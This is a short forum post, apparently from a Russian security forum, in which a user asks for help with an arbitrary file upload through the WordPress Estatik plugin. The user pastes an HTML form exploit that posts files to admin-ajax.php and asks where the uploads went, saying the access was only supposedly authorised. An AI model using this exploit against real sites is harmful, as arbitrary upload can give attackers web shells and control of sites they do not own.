• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Arbitrary Upload File

25.09.2019
5
0
Имеется сайт, сразу скажу, что (Вроде как), мои действия на нём были разрешены мне, имеется вопрос, на сайте имеется уязвимость, плагин estatik имеется, есть соответственно так же сплойт-код
Код:
<html> <body> <form action="(САЙТ)/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="es_prop_media_images" />
<input type="file" name="es_media_images[]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Зашёл в директорию /wp-content/uploads И НИЧЕРТА, серьезно, загружал тхт, джпег, пнг файл и ничерта нет.
Все папки(кроме 1) в 2019-м пусты, куда может загрузился этот файл? ИБо даже wpscan показывает, что присутствует.

_ _ _ 2019-09-28 07-31-11.png
_ _ _ 2019-09-28 07-31-21.png
_ _ _ 2019-09-28 07-31-34.png
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab